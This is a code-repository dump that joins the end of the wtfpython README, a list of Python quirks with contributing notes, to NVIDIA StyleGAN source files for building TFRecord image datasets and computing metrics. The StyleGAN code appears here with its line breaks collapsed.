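  time.sleep(3)
  ```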
* List slicing with out-of-bounds indices throws no errors
  ```py
  >>> some_list = [1, 2, 3, 4, 5]
  >>> some_list[111:]
  []
  ```

* Slicing an iterable does not always create a new object. For example,
  ```py
  >>> some_str = "wtfpython"
  >>> some_list = ['w', 't', 'f', 'p', 'y', 't', 'h', 'o', 'n']
  >>> some_list is some_list[:] # False expected because a new object is created.
  False
  >>> some_str is some_str[:] # True because strings are immutable, so making a new object is not of much use.
  True
  ```

* `int('١٢٣٤٥٦٧٨٩')` returns `123456789` in Python 3. In Python, Decimal characters include digit characters, and all characters that can be used to form decimal-radix numbers, e.g. U+0660, ARABIC-INDIC DIGIT ZERO. Here's an [interesting story](https://chris.improbable.org/2014/8/25/adventures-in-unicode-digits/) related to this behavior of Python.

* You can separate numeric literals with underscores (for better readability) from Python 3 onwards.
  ```py
  >>> six_million = 6_000_000
  >>> six_million
  6000000
  >>> hex_address = 0xF00D_CAFE
  >>> hex_address
  4027435774
  ```

* `'abc'.count('') == 4`. Here's an approximate implementation of the `count` method, which makes things clearer:
  ```py
  def count(s, sub):
      result = 0
      for i in range(len(s) + 1 - len(sub)):
          result += (s[i:i + len(sub)] == sub)
      return result
  ```
  The behavior is due to the empty substring (`''`) matching slices of length 0 in the original string.

---
---

# Contributing

A few ways in which you can contribute to wtfpython,

- Suggesting new examples
- Helping with translation (See [issues labeled translation](https://github.com/satwikkansal/wtfpython/issues?q=is%3Aissue+is%3Aopen+label%3Atranslation))
- Minor corrections like pointing out outdated snippets, typos, formatting errors, etc.
- Identifying gaps (things like inadequate explanation, redundant examples, etc.)
- Any creative suggestions to make this project more fun and useful

Please see [CONTRIBUTING.md](/CONTRIBUTING.md) for more details. Feel free to create a new [issue](https://github.com/satwikkansal/wtfpython/issues/new) to discuss things.

PS: Please don't reach out with backlinking requests; no links will be added unless they're highly relevant to the project.

# Acknowledgements

The idea and design for this collection were initially inspired by Denys Dovhan's awesome project [wtfjs](https://github.com/denysdovhan/wtfjs). The overwhelming support by Pythonistas gave it the shape it is in right now.

#### Some nice Links!
* https://www.youtube.com/watch?v=sH4XF6pKKmk
* https://www.reddit.com/r/Python/comments/3cu6ej/what_are_some_wtf_things_about_python
* https://sopython.com/wiki/Common_Gotchas_In_Python
* https://stackoverflow.com/questions/530530/python-2-x-gotchas-and-landmines
* https://stackoverflow.com/questions/1011431/common-pitfalls-in-python
* https://www.python.org/doc/humor/
* https://github.com/cosmologicon/pywat#the-undocumented-converse-implication-operator
* https://github.com/wemake-services/wemake-python-styleguide/search?q=wtfpython&type=Issues
* WTFPython discussion threads on [Hacker News](https://news.ycombinator.com/item?id=21862073) and [Reddit](https://www.reddit.com/r/programming/comments/edsh3q/what_the_fck_python_30_exploring_and/).
# 🎓 License [![WTFPL 2.0][license-image]][license-url] &copy; [Satwik Kansal](https://satwikkansal.xyz) [license-url]: http://www.wtfpl.net [license-image]: https://img.shields.io/badge/License-WTFPL%202.0-lightgrey.svg?style=flat-square ## Surprise your friends as well! If you like wtfpython, you can use these quick links to share it with your friends, [Twitter](https://twitter.com/intent/tweet?url=https://github.com/satwikkansal/wtfpython&text=If%20you%20really%20think%20you%20know%20Python,%20think%20once%20more!%20Check%20out%20wtfpython&hashtags=python,wtfpython) | [Linkedin](https://www.linkedin.com/shareArticle?url=https://github.com/satwikkansal&title=What%20the%20f*ck%20Python!&summary=If%20you%20really%20thing%20you%20know%20Python,%20think%20once%20more!) | [Facebook](https://www.facebook.com/dialog/share?app_id=536779657179021&display=page&href=https%3A%2F%2Fgithub.com%2Fsatwikkansal%2Fwtfpython&quote=If%20you%20really%20think%20you%20know%20Python%2C%20think%20once%20more!) ## Need a pdf version? I've received a few requests for the pdf (and epub) version of wtfpython. You can add your details [here](https://form.jotform.com/221593245656057) to get them as soon as they are finished. **That's all folks!** For upcoming content like this, you can add your email [here](https://form.jotform.com/221593598380062).
stylegan
1e0d5c781384ef12b50ef20a62fee5d78b38e88f
File: dataset_tool.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Tool for creating multi-resolution TFRecords datasets for StyleGAN and ProGAN.""" # pylint: disable=too-many-lines import os import sys import glob import argparse import threading import six.moves.queue as Queue # pylint: disable=import-error import traceback import numpy as np import tensorflow as tf import PIL.Image import dnnlib.tflib as tflib from training import dataset #---------------------------------------------------------------------------- def error(msg): print('Error: ' + msg) exit(1) #---------------------------------------------------------------------------- class TFRecordExporter: def __init__(self, tfrecord_dir, expected_images, print_progress=True, progress_interval=10): self.tfrecord_dir = tfrecord_dir self.tfr_prefix = os.path.join(self.tfrecord_dir, os.path.basename(self.tfrecord_dir)) self.expected_images = expected_images self.cur_images = 0 self.shape = None self.resolution_log2 = None self.tfr_writers = [] self.print_progress = print_progress self.progress_interval = progress_interval if self.print_progress: print('Creating dataset "%s"' % tfrecord_dir) if not os.path.isdir(self.tfrecord_dir): os.makedirs(self.tfrecord_dir) assert os.path.isdir(self.tfrecord_dir) def close(self): if self.print_progress: print('%-40s\r' % 'Flushing data...', end='', flush=True) for tfr_writer in self.tfr_writers: tfr_writer.close() self.tfr_writers = [] if self.print_progress: print('%-40s\r' % '', end='', flush=True) print('Added %d images.' % self.cur_images) def choose_shuffled_order(self): # Note: Images and labels must be added in shuffled order. 
order = np.arange(self.expected_images) np.random.RandomState(123).shuffle(order) return order def add_image(self, img): if self.print_progress and self.cur_images % self.progress_interval == 0: print('%d / %d\r' % (self.cur_images, self.expected_images), end='', flush=True) if self.shape is None: self.shape = img.shape self.resolution_log2 = int(np.log2(self.shape[1])) assert self.shape[0] in [1, 3] assert self.shape[1] == self.shape[2] assert self.shape[1] == 2**self.resolution_log2 tfr_opt = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.NONE) for lod in range(self.resolution_log2 - 1): tfr_file = self.tfr_prefix + '-r%02d.tfrecords' % (self.resolution_log2 - lod) self.tfr_writers.append(tf.python_io.TFRecordWriter(tfr_file, tfr_opt)) assert img.shape == self.shape for lod, tfr_writer in enumerate(self.tfr_writers): if lod: img = img.astype(np.float32) img = (img[:, 0::2, 0::2] + img[:, 0::2, 1::2] + img[:, 1::2, 0::2] + img[:, 1::2, 1::2]) * 0.25 quant = np.rint(img).clip(0, 255).astype(np.uint8) ex = tf.train.Example(features=tf.train.Features(feature={ 'shape': tf.train.Feature(int64_list=tf.train.Int64List(value=quant.shape)), 'data': tf.train.Feature(bytes_list=tf.train.BytesList(value=[quant.tostring()]))})) tfr_writer.write(ex.SerializeToString()) self.cur_images += 1 def add_labels(self, labels): if self.print_progress: print('%-40s\r' % 'Saving labels...', end='', flush=True) assert labels.shape[0] == self.cur_images with open(self.tfr_prefix + '-rxx.labels', 'wb') as f: np.save(f, labels.astype(np.float32)) def __enter__(self): return self def __exit__(self, *args): self.close() #---------------------------------------------------------------------------- class ExceptionInfo(object): def __init__(self): self.value = sys.exc_info()[1] self.traceback = traceback.format_exc() #---------------------------------------------------------------------------- class WorkerThread(threading.Thread): def __init__(self, task_queue): threading.Thread.__init__(self) self.task_queue = task_queue def run(self): while True: func, args, result_queue = self.task_queue.get() if func is None: break try: result = func(*args) except: result = ExceptionInfo() result_queue.put((result, args)) #---------------------------------------------------------------------------- class ThreadPool(object): def __init__(self, num_threads): assert num_threads >= 1 self.task_queue = Queue.Queue() self.result_queues = dict() self.num_threads = num_threads for _idx in range(self.num_threads): thread = WorkerThread(self.task_queue) thread.daemon = True thread.start() def add_task(self, func, args=()): assert hasattr(func, '__call__') # must be a function if func not in self.result_queues: self.result_queues[func] = Queue.Queue() self.task_queue.put((func, args, self.result_queues[func])) def get_result(self, func): # returns (result, args) result, args = self.result_queues[func].get() if isinstance(result, ExceptionInfo): print('\n\nWorker thread caught an exception:\n' + result.traceback) raise result.value return result, args def finish(self): for _idx in range(self.num_threads): self.task_queue.put((None, (), None)) def __enter__(self): # for 'with' statement return self def __exit__(self, *excinfo): self.finish() def process_items_concurrently(self, item_iterator, process_func=lambda x: x, pre_func=lambda x: x, post_func=lambda x: x, max_items_in_flight=None): if max_items_in_flight is None: max_items_in_flight = self.num_threads * 4 assert max_items_in_flight >= 1 results = [] retire_idx = [0] def 
task_func(prepared, _idx): return process_func(prepared) def retire_result(): processed, (_prepared, idx) = self.get_result(task_func) results[idx] = processed while retire_idx[0] < len(results) and results[retire_idx[0]] is not None: yield post_func(results[retire_idx[0]]) results[retire_idx[0]] = None retire_idx[0] += 1 for idx, item in enumerate(item_iterator): prepared = pre_func(item) results.append(None) self.add_task(func=task_func, args=(prepared, idx)) while retire_idx[0] < idx - max_items_in_flight + 2: for res in retire_result(): yield res while retire_idx[0] < len(results): for res in retire_result(): yield res #---------------------------------------------------------------------------- def display(tfrecord_dir): print('Loading dataset "%s"' % tfrecord_dir) tflib.init_tf({'gpu_options.allow_growth': True}) dset = dataset.TFRecordDataset(tfrecord_dir, max_label_size='full', repeat=False, shuffle_mb=0) tflib.init_uninitialized_vars() import cv2 # pip install opencv-python idx = 0 while True: try: images, labels = dset.get_minibatch_np(1) except tf.errors.OutOfRangeError: break if idx == 0: print('Displaying images') cv2.namedWindow('dataset_tool') print('Press SPACE or ENTER to advance, ESC to exit') print('\nidx = %-8d\nlabel = %s' % (idx, labels[0].tolist())) cv2.imshow('dataset_tool', images[0].transpose(1, 2, 0)[:, :, ::-1]) # CHW => HWC, RGB => BGR idx += 1 if cv2.waitKey() == 27: break print('\nDisplayed %d images.' % idx) #---------------------------------------------------------------------------- def extract(tfrecord_dir, output_dir): print('Loading dataset "%s"' % tfrecord_dir) tflib.init_tf({'gpu_options.allow_growth': True}) dset = dataset.TFRecordDataset(tfrecord_dir, max_label_size=0, repeat=False, shuffle_mb=0) tflib.init_uninitialized_vars() print('Extracting images to "%s"' % output_dir) if not os.path.isdir(output_dir): os.makedirs(output_dir) idx = 0 while True: if idx % 10 == 0: print('%d\r' % idx, end='', flush=True) try: images, _labels = dset.get_minibatch_np(1) except tf.errors.OutOfRangeError: break if images.shape[1] == 1: img = PIL.Image.fromarray(images[0][0], 'L') else: img = PIL.Image.fromarray(images[0].transpose(1, 2, 0), 'RGB') img.save(os.path.join(output_dir, 'img%08d.png' % idx)) idx += 1 print('Extracted %d images.' 
% idx) #---------------------------------------------------------------------------- def compare(tfrecord_dir_a, tfrecord_dir_b, ignore_labels): max_label_size = 0 if ignore_labels else 'full' print('Loading dataset "%s"' % tfrecord_dir_a) tflib.init_tf({'gpu_options.allow_growth': True}) dset_a = dataset.TFRecordDataset(tfrecord_dir_a, max_label_size=max_label_size, repeat=False, shuffle_mb=0) print('Loading dataset "%s"' % tfrecord_dir_b) dset_b = dataset.TFRecordDataset(tfrecord_dir_b, max_label_size=max_label_size, repeat=False, shuffle_mb=0) tflib.init_uninitialized_vars() print('Comparing datasets') idx = 0 identical_images = 0 identical_labels = 0 while True: if idx % 100 == 0: print('%d\r' % idx, end='', flush=True) try: images_a, labels_a = dset_a.get_minibatch_np(1) except tf.errors.OutOfRangeError: images_a, labels_a = None, None try: images_b, labels_b = dset_b.get_minibatch_np(1) except tf.errors.OutOfRangeError: images_b, labels_b = None, None if images_a is None or images_b is None: if images_a is not None or images_b is not None: print('Datasets contain different number of images') break if images_a.shape == images_b.shape and np.all(images_a == images_b): identical_images += 1 else: print('Image %d is different' % idx) if labels_a.shape == labels_b.shape and np.all(labels_a == labels_b): identical_labels += 1 else: print('Label %d is different' % idx) idx += 1 print('Identical images: %d / %d' % (identical_images, idx)) if not ignore_labels: print('Identical labels: %d / %d' % (identical_labels, idx)) #---------------------------------------------------------------------------- def create_mnist(tfrecord_dir, mnist_dir): print('Loading MNIST from "%s"' % mnist_dir) import gzip with gzip.open(os.path.join(mnist_dir, 'train-images-idx3-ubyte.gz'), 'rb') as file: images = np.frombuffer(file.read(), np.uint8, offset=16) with gzip.open(os.path.join(mnist_dir, 'train-labels-idx1-ubyte.gz'), 'rb') as file: labels = np.frombuffer(file.read(), np.uint8, offset=8) images = images.reshape(-1, 1, 28, 28) images = np.pad(images, [(0,0), (0,0), (2,2), (2,2)], 'constant', constant_values=0) assert images.shape == (60000, 1, 32, 32) and images.dtype == np.uint8 assert labels.shape == (60000,) and labels.dtype == np.uint8 assert np.min(images) == 0 and np.max(images) == 255 assert np.min(labels) == 0 and np.max(labels) == 9 onehot = np.zeros((labels.size, np.max(labels) + 1), dtype=np.float32) onehot[np.arange(labels.size), labels] = 1.0 with TFRecordExporter(tfrecord_dir, images.shape[0]) as tfr: order = tfr.choose_shuffled_order() for idx in range(order.size): tfr.add_image(images[order[idx]]) tfr.add_labels(onehot[order]) #---------------------------------------------------------------------------- def create_mnistrgb(tfrecord_dir, mnist_dir, num_images=1000000, random_seed=123): print('Loading MNIST from "%s"' % mnist_dir) import gzip with gzip.open(os.path.join(mnist_dir, 'train-images-idx3-ubyte.gz'), 'rb') as file: images = np.frombuffer(file.read(), np.uint8, offset=16) images = images.reshape(-1, 28, 28) images = np.pad(images, [(0,0), (2,2), (2,2)], 'constant', constant_values=0) assert images.shape == (60000, 32, 32) and images.dtype == np.uint8 assert np.min(images) == 0 and np.max(images) == 255 with TFRecordExporter(tfrecord_dir, num_images) as tfr: rnd = np.random.RandomState(random_seed) for _idx in range(num_images): tfr.add_image(images[rnd.randint(images.shape[0], size=3)]) #---------------------------------------------------------------------------- def 
create_cifar10(tfrecord_dir, cifar10_dir): print('Loading CIFAR-10 from "%s"' % cifar10_dir) import pickle images = [] labels = [] for batch in range(1, 6): with open(os.path.join(cifar10_dir, 'data_batch_%d' % batch), 'rb') as file: data = pickle.load(file, encoding='latin1') images.append(data['data'].reshape(-1, 3, 32, 32)) labels.append(data['labels']) images = np.concatenate(images) labels = np.concatenate(labels) assert images.shape == (50000, 3, 32, 32) and images.dtype == np.uint8 assert labels.shape == (50000,) and labels.dtype == np.int32 assert np.min(images) == 0 and np.max(images) == 255 assert np.min(labels) == 0 and np.max(labels) == 9 onehot = np.zeros((labels.size, np.max(labels) + 1), dtype=np.float32) onehot[np.arange(labels.size), labels] = 1.0 with TFRecordExporter(tfrecord_dir, images.shape[0]) as tfr: order = tfr.choose_shuffled_order() for idx in range(order.size): tfr.add_image(images[order[idx]]) tfr.add_labels(onehot[order]) #---------------------------------------------------------------------------- def create_cifar100(tfrecord_dir, cifar100_dir): print('Loading CIFAR-100 from "%s"' % cifar100_dir) import pickle with open(os.path.join(cifar100_dir, 'train'), 'rb') as file: data = pickle.load(file, encoding='latin1') images = data['data'].reshape(-1, 3, 32, 32) labels = np.array(data['fine_labels']) assert images.shape == (50000, 3, 32, 32) and images.dtype == np.uint8 assert labels.shape == (50000,) and labels.dtype == np.int32 assert np.min(images) == 0 and np.max(images) == 255 assert np.min(labels) == 0 and np.max(labels) == 99 onehot = np.zeros((labels.size, np.max(labels) + 1), dtype=np.float32) onehot[np.arange(labels.size), labels] = 1.0 with TFRecordExporter(tfrecord_dir, images.shape[0]) as tfr: order = tfr.choose_shuffled_order() for idx in range(order.size): tfr.add_image(images[order[idx]]) tfr.add_labels(onehot[order]) #---------------------------------------------------------------------------- def create_svhn(tfrecord_dir, svhn_dir): print('Loading SVHN from "%s"' % svhn_dir) import pickle images = [] labels = [] for batch in range(1, 4): with open(os.path.join(svhn_dir, 'train_%d.pkl' % batch), 'rb') as file: data = pickle.load(file, encoding='latin1') images.append(data[0]) labels.append(data[1]) images = np.concatenate(images) labels = np.concatenate(labels) assert images.shape == (73257, 3, 32, 32) and images.dtype == np.uint8 assert labels.shape == (73257,) and labels.dtype == np.uint8 assert np.min(images) == 0 and np.max(images) == 255 assert np.min(labels) == 0 and np.max(labels) == 9 onehot = np.zeros((labels.size, np.max(labels) + 1), dtype=np.float32) onehot[np.arange(labels.size), labels] = 1.0 with TFRecordExporter(tfrecord_dir, images.shape[0]) as tfr: order = tfr.choose_shuffled_order() for idx in range(order.size): tfr.add_image(images[order[idx]]) tfr.add_labels(onehot[order]) #---------------------------------------------------------------------------- def create_lsun(tfrecord_dir, lmdb_dir, resolution=256, max_images=None): print('Loading LSUN dataset from "%s"' % lmdb_dir) import lmdb # pip install lmdb # pylint: disable=import-error import cv2 # pip install opencv-python import io with lmdb.open(lmdb_dir, readonly=True).begin(write=False) as txn: total_images = txn.stat()['entries'] # pylint: disable=no-value-for-parameter if max_images is None: max_images = total_images with TFRecordExporter(tfrecord_dir, max_images) as tfr: for _idx, (_key, value) in enumerate(txn.cursor()): try: try: img = cv2.imdecode(np.fromstring(value, 
dtype=np.uint8), 1) if img is None: raise IOError('cv2.imdecode failed') img = img[:, :, ::-1] # BGR => RGB except IOError: img = np.asarray(PIL.Image.open(io.BytesIO(value))) crop = np.min(img.shape[:2]) img = img[(img.shape[0] - crop) // 2 : (img.shape[0] + crop) // 2, (img.shape[1] - crop) // 2 : (img.shape[1] + crop) // 2] img = PIL.Image.fromarray(img, 'RGB') img = img.resize((resolution, resolution), PIL.Image.ANTIALIAS) img = np.asarray(img) img = img.transpose([2, 0, 1]) # HWC => CHW tfr.add_image(img) except: print(sys.exc_info()[1]) if tfr.cur_images == max_images: break #---------------------------------------------------------------------------- def create_lsun_wide(tfrecord_dir, lmdb_dir, width=512, height=384, max_images=None): assert width == 2 ** int(np.round(np.log2(width))) assert height <= width print('Loading LSUN dataset from "%s"' % lmdb_dir) import lmdb # pip install lmdb # pylint: disable=import-error import cv2 # pip install opencv-python import io with lmdb.open(lmdb_dir, readonly=True).begin(write=False) as txn: total_images = txn.stat()['entries'] # pylint: disable=no-value-for-parameter if max_images is None: max_images = total_images with TFRecordExporter(tfrecord_dir, max_images, print_progress=False) as tfr: for idx, (_key, value) in enumerate(txn.cursor()): try: try: img = cv2.imdecode(np.fromstring(value, dtype=np.uint8), 1) if img is None: raise IOError('cv2.imdecode failed') img = img[:, :, ::-1] # BGR => RGB except IOError: img = np.asarray(PIL.Image.open(io.BytesIO(value))) ch = int(np.round(width * img.shape[0] / img.shape[1])) if img.shape[1] < width or ch < height: continue img = img[(img.shape[0] - ch) // 2 : (img.shape[0] + ch) // 2] img = PIL.Image.fromarray(img, 'RGB') img = img.resize((width, height), PIL.Image.ANTIALIAS) img = np.asarray(img) img = img.transpose([2, 0, 1]) # HWC => CHW canvas = np.zeros([3, width, width], dtype=np.uint8) canvas[:, (width - height) // 2 : (width + height) // 2] = img tfr.add_image(canvas) print('\r%d / %d => %d ' % (idx + 1, total_images, tfr.cur_images), end='') except: print(sys.exc_info()[1]) if tfr.cur_images == max_images: break print() #---------------------------------------------------------------------------- def create_celeba(tfrecord_dir, celeba_dir, cx=89, cy=121): print('Loading CelebA from "%s"' % celeba_dir) glob_pattern = os.path.join(celeba_dir, 'img_align_celeba_png', '*.png') image_filenames = sorted(glob.glob(glob_pattern)) expected_images = 202599 if len(image_filenames) != expected_images: error('Expected to find %d images' % expected_images) with TFRecordExporter(tfrecord_dir, len(image_filenames)) as tfr: order = tfr.choose_shuffled_order() for idx in range(order.size): img = np.asarray(PIL.Image.open(image_filenames[order[idx]])) assert img.shape == (218, 178, 3) img = img[cy - 64 : cy + 64, cx - 64 : cx + 64] img = img.transpose(2, 0, 1) # HWC => CHW tfr.add_image(img) #---------------------------------------------------------------------------- def create_from_images(tfrecord_dir, image_dir, shuffle): print('Loading images from "%s"' % image_dir) image_filenames = sorted(glob.glob(os.path.join(image_dir, '*'))) if len(image_filenames) == 0: error('No input images found') img = np.asarray(PIL.Image.open(image_filenames[0])) resolution = img.shape[0] channels = img.shape[2] if img.ndim == 3 else 1 if img.shape[1] != resolution: error('Input images must have the same width and height') if resolution != 2 ** int(np.floor(np.log2(resolution))): error('Input image resolution must be a 
power-of-two') if channels not in [1, 3]: error('Input images must be stored as RGB or grayscale') with TFRecordExporter(tfrecord_dir, len(image_filenames)) as tfr: order = tfr.choose_shuffled_order() if shuffle else np.arange(len(image_filenames)) for idx in range(order.size): img = np.asarray(PIL.Image.open(image_filenames[order[idx]])) if channels == 1: img = img[np.newaxis, :, :] # HW => CHW else: img = img.transpose([2, 0, 1]) # HWC => CHW tfr.add_image(img) #---------------------------------------------------------------------------- def create_from_hdf5(tfrecord_dir, hdf5_filename, shuffle): print('Loading HDF5 archive from "%s"' % hdf5_filename) import h5py # conda install h5py with h5py.File(hdf5_filename, 'r') as hdf5_file: hdf5_data = max([value for key, value in hdf5_file.items() if key.startswith('data')], key=lambda lod: lod.shape[3]) with TFRecordExporter(tfrecord_dir, hdf5_data.shape[0]) as tfr: order = tfr.choose_shuffled_order() if shuffle else np.arange(hdf5_data.shape[0]) for idx in range(order.size): tfr.add_image(hdf5_data[order[idx]]) npy_filename = os.path.splitext(hdf5_filename)[0] + '-labels.npy' if os.path.isfile(npy_filename): tfr.add_labels(np.load(npy_filename)[order]) #---------------------------------------------------------------------------- def execute_cmdline(argv): prog = argv[0] parser = argparse.ArgumentParser( prog = prog, description = 'Tool for creating multi-resolution TFRecords datasets for StyleGAN and ProGAN.', epilog = 'Type "%s <command> -h" for more information.' % prog) subparsers = parser.add_subparsers(dest='command') subparsers.required = True def add_command(cmd, desc, example=None): epilog = 'Example: %s %s' % (prog, example) if example is not None else None return subparsers.add_parser(cmd, description=desc, help=desc, epilog=epilog) p = add_command( 'display', 'Display images in dataset.', 'display datasets/mnist') p.add_argument( 'tfrecord_dir', help='Directory containing dataset') p = add_command( 'extract', 'Extract images from dataset.', 'extract datasets/mnist mnist-images') p.add_argument( 'tfrecord_dir', help='Directory containing dataset') p.add_argument( 'output_dir', help='Directory to extract the images into') p = add_command( 'compare', 'Compare two datasets.', 'compare datasets/mydataset datasets/mnist') p.add_argument( 'tfrecord_dir_a', help='Directory containing first dataset') p.add_argument( 'tfrecord_dir_b', help='Directory containing second dataset') p.add_argument( '--ignore_labels', help='Ignore labels (default: 0)', type=int, default=0) p = add_command( 'create_mnist', 'Create dataset for MNIST.', 'create_mnist datasets/mnist ~/downloads/mnist') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'mnist_dir', help='Directory containing MNIST') p = add_command( 'create_mnistrgb', 'Create dataset for MNIST-RGB.', 'create_mnistrgb datasets/mnistrgb ~/downloads/mnist') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'mnist_dir', help='Directory containing MNIST') p.add_argument( '--num_images', help='Number of composite images to create (default: 1000000)', type=int, default=1000000) p.add_argument( '--random_seed', help='Random seed (default: 123)', type=int, default=123) p = add_command( 'create_cifar10', 'Create dataset for CIFAR-10.', 'create_cifar10 datasets/cifar10 ~/downloads/cifar10') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'cifar10_dir', help='Directory containing 
CIFAR-10') p = add_command( 'create_cifar100', 'Create dataset for CIFAR-100.', 'create_cifar100 datasets/cifar100 ~/downloads/cifar100') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'cifar100_dir', help='Directory containing CIFAR-100') p = add_command( 'create_svhn', 'Create dataset for SVHN.', 'create_svhn datasets/svhn ~/downloads/svhn') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'svhn_dir', help='Directory containing SVHN') p = add_command( 'create_lsun', 'Create dataset for single LSUN category.', 'create_lsun datasets/lsun-car-100k ~/downloads/lsun/car_lmdb --resolution 256 --max_images 100000') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'lmdb_dir', help='Directory containing LMDB database') p.add_argument( '--resolution', help='Output resolution (default: 256)', type=int, default=256) p.add_argument( '--max_images', help='Maximum number of images (default: none)', type=int, default=None) p = add_command( 'create_lsun_wide', 'Create LSUN dataset with non-square aspect ratio.', 'create_lsun_wide datasets/lsun-car-512x384 ~/downloads/lsun/car_lmdb --width 512 --height 384') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'lmdb_dir', help='Directory containing LMDB database') p.add_argument( '--width', help='Output width (default: 512)', type=int, default=512) p.add_argument( '--height', help='Output height (default: 384)', type=int, default=384) p.add_argument( '--max_images', help='Maximum number of images (default: none)', type=int, default=None) p = add_command( 'create_celeba', 'Create dataset for CelebA.', 'create_celeba datasets/celeba ~/downloads/celeba') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'celeba_dir', help='Directory containing CelebA') p.add_argument( '--cx', help='Center X coordinate (default: 89)', type=int, default=89) p.add_argument( '--cy', help='Center Y coordinate (default: 121)', type=int, default=121) p = add_command( 'create_from_images', 'Create dataset from a directory full of images.', 'create_from_images datasets/mydataset myimagedir') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'image_dir', help='Directory containing the images') p.add_argument( '--shuffle', help='Randomize image order (default: 1)', type=int, default=1) p = add_command( 'create_from_hdf5', 'Create dataset from legacy HDF5 archive.', 'create_from_hdf5 datasets/celebahq ~/downloads/celeba-hq-1024x1024.h5') p.add_argument( 'tfrecord_dir', help='New dataset directory to be created') p.add_argument( 'hdf5_filename', help='HDF5 archive containing the images') p.add_argument( '--shuffle', help='Randomize image order (default: 1)', type=int, default=1) args = parser.parse_args(argv[1:] if len(argv) > 1 else ['-h']) func = globals()[args.command] del args.command func(**vars(args)) #---------------------------------------------------------------------------- if __name__ == "__main__": execute_cmdline(sys.argv) #---------------------------------------------------------------------------- File: run_metrics.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. 
To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Main entry point for training StyleGAN and ProGAN networks.""" import dnnlib from dnnlib import EasyDict import dnnlib.tflib as tflib import config from metrics import metric_base from training import misc #---------------------------------------------------------------------------- def run_pickle(submit_config, metric_args, network_pkl, dataset_args, mirror_augment): ctx = dnnlib.RunContext(submit_config) tflib.init_tf() print('Evaluating %s metric on network_pkl "%s"...' % (metric_args.name, network_pkl)) metric = dnnlib.util.call_func_by_name(**metric_args) print() metric.run(network_pkl, dataset_args=dataset_args, mirror_augment=mirror_augment, num_gpus=submit_config.num_gpus) print() ctx.close() #---------------------------------------------------------------------------- def run_snapshot(submit_config, metric_args, run_id, snapshot): ctx = dnnlib.RunContext(submit_config) tflib.init_tf() print('Evaluating %s metric on run_id %s, snapshot %s...' % (metric_args.name, run_id, snapshot)) run_dir = misc.locate_run_dir(run_id) network_pkl = misc.locate_network_pkl(run_dir, snapshot) metric = dnnlib.util.call_func_by_name(**metric_args) print() metric.run(network_pkl, run_dir=run_dir, num_gpus=submit_config.num_gpus) print() ctx.close() #---------------------------------------------------------------------------- def run_all_snapshots(submit_config, metric_args, run_id): ctx = dnnlib.RunContext(submit_config) tflib.init_tf() print('Evaluating %s metric on all snapshots of run_id %s...' % (metric_args.name, run_id)) run_dir = misc.locate_run_dir(run_id) network_pkls = misc.list_network_pkls(run_dir) metric = dnnlib.util.call_func_by_name(**metric_args) print() for idx, network_pkl in enumerate(network_pkls): ctx.update('', idx, len(network_pkls)) metric.run(network_pkl, run_dir=run_dir, num_gpus=submit_config.num_gpus) print() ctx.close() #---------------------------------------------------------------------------- def main(): submit_config = dnnlib.SubmitConfig() # Which metrics to evaluate? metrics = [] metrics += [metric_base.fid50k] #metrics += [metric_base.ppl_zfull] #metrics += [metric_base.ppl_wfull] #metrics += [metric_base.ppl_zend] #metrics += [metric_base.ppl_wend] #metrics += [metric_base.ls] #metrics += [metric_base.dummy] # Which networks to evaluate them on? tasks = [] tasks += [EasyDict(run_func_name='run_metrics.run_pickle', network_pkl='https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ', dataset_args=EasyDict(tfrecord_dir='ffhq', shuffle_mb=0), mirror_augment=True)] # karras2019stylegan-ffhq-1024x1024.pkl #tasks += [EasyDict(run_func_name='run_metrics.run_snapshot', run_id=100, snapshot=25000)] #tasks += [EasyDict(run_func_name='run_metrics.run_all_snapshots', run_id=100)] # How many GPUs to use? submit_config.num_gpus = 1 #submit_config.num_gpus = 2 #submit_config.num_gpus = 4 #submit_config.num_gpus = 8 # Execute. 
submit_config.run_dir_root = dnnlib.submission.submit.get_template_from_path(config.result_dir) submit_config.run_dir_ignore += config.run_dir_ignore for task in tasks: for metric in metrics: submit_config.run_desc = '%s-%s' % (task.run_func_name, metric.name) if task.run_func_name.endswith('run_snapshot'): submit_config.run_desc += '-%s-%s' % (task.run_id, task.snapshot) if task.run_func_name.endswith('run_all_snapshots'): submit_config.run_desc += '-%s' % task.run_id submit_config.run_desc += '-%dgpu' % submit_config.num_gpus dnnlib.submit_run(submit_config, metric_args=metric, **task) #---------------------------------------------------------------------------- if __name__ == "__main__": main() #---------------------------------------------------------------------------- File: generate_figures.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Minimal script for reproducing the figures of the StyleGAN paper using pre-trained generators.""" import os import pickle import numpy as np import PIL.Image import dnnlib import dnnlib.tflib as tflib import config #---------------------------------------------------------------------------- # Helpers for loading and using pre-trained generators. url_ffhq = 'https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ' # karras2019stylegan-ffhq-1024x1024.pkl url_celebahq = 'https://drive.google.com/uc?id=1MGqJl28pN4t7SAtSrPdSRJSQJqahkzUf' # karras2019stylegan-celebahq-1024x1024.pkl 